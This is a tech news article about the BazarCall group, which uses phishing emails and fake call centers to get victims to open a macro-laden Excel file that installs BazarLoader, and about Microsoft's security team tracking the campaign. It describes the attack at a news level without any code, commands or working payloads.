This is something repeatedly said here on Make Tech Easier, as we report the news: every time the scammers and bad actors develop a new attack, the tech industry finds a way to fight back and close that vulnerability. This causes the attackers to go back to the drawing board and create a new attack. It just continues on and on. The newest attack point for ransomware is call centers. Will this force Microsoft to amp up its game to fight back?
Call Centers Ransomware Attack
While this battle has now escalated to the attackers becoming emboldened to set up fake call centers, it means the ball’s in Microsoft’s court to stop them. Microsoft has a team of cybersecurity researchers on the case. They’re after the BazarCall group for the ransomware attack that hit the call centers.
Users who place a call into the call centers wind up with their PCs infected with a malware loader known as BazarLoader that distributes malware.
The BazarCall (aka Bazacall) group has been at this since the beginning of the year. They use call center operators to convince callers to install BazarLoader onto their PCs.
Brad Duncan, with the Palo Alto Networks cybersecurity company, described the attack by saying, “After a client is infected, criminals use this backdoor access to send follow-up malware, scan the environment, and exploit other vulnerable hosts on the network.”
The attack starts with a Windows user receiving a phishing email. This informs them that a subscription trial has expired and that they will be charged a fee. To avoid this, they need to call and cancel.
The focus of the Microsoft Security Intelligence team is on the emails that target Office 365 users. A sample email is from the attackers claiming to be from a tech company. The email says the user will be charged when a demo expires in 24 hours.
“When recipients call the number, a fraudulent call center operated by the attackers instructs them to visit a website and download an Excel file to cancel the service. The Excel file contains a malicious macro that downloads the payload,” described the security team.
Microsoft’s team also said the Cobalt Strike penetration testing kit is used to obtain credentials. The kit is often used after a system is initially compromised. Among the information stolen is the Active Directory database that includes identity and credential information gathered by Cobalt Strike.
After the Attack
Again, this is just part of a round-robin situation and is a bit alarming to consider where it will lead to next. BazarCall used a familiar attack but carried it out in such a way to make users unsuspecting. Not all users would expect that the call centers they are being directed to would kick off a ransomware attack.
But now that the Microsoft security team is onto BazarCall and figured out the attack, the cybercriminals will be forced to move onto a new destructive plan. And that’s where the alarm comes in: what will the attackers do next? How will they up their game this time?